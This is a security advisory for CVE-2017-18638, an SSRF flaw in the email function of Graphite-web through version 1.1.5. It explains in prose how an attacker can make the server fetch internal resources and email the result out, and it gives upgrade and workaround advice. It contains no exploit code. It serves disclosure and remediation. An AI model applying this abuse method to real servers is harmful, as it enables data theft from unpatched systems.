CVE-2017-18638

Name of the Vulnerable Software and Affected Versions Graphite versions through 1.1.5 Graphite version 1.1.5

Description The send email function in graphite-web/webapp/graphite/composer/views.py is vulnerable to Server-Side Request Forgery (SSRF). An attacker can use the vulnerable SSRF endpoint to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address supplied by the attacker, allowing the attacker to exfiltrate any information. The email is sent through the SMTP server configured in Graphite, which defaults to 'localhost'.

Recommendations For Graphite versions through 1.1.5, update to Graphite-web 1.1.6 or apply the patches released for graphite-web [1.0.x] and [0.9.x]. As a temporary workaround, consider manually removing the send email function from the file webapp/graphite/composer/views.py, as this function is not in use and will not affect the Graphite installation.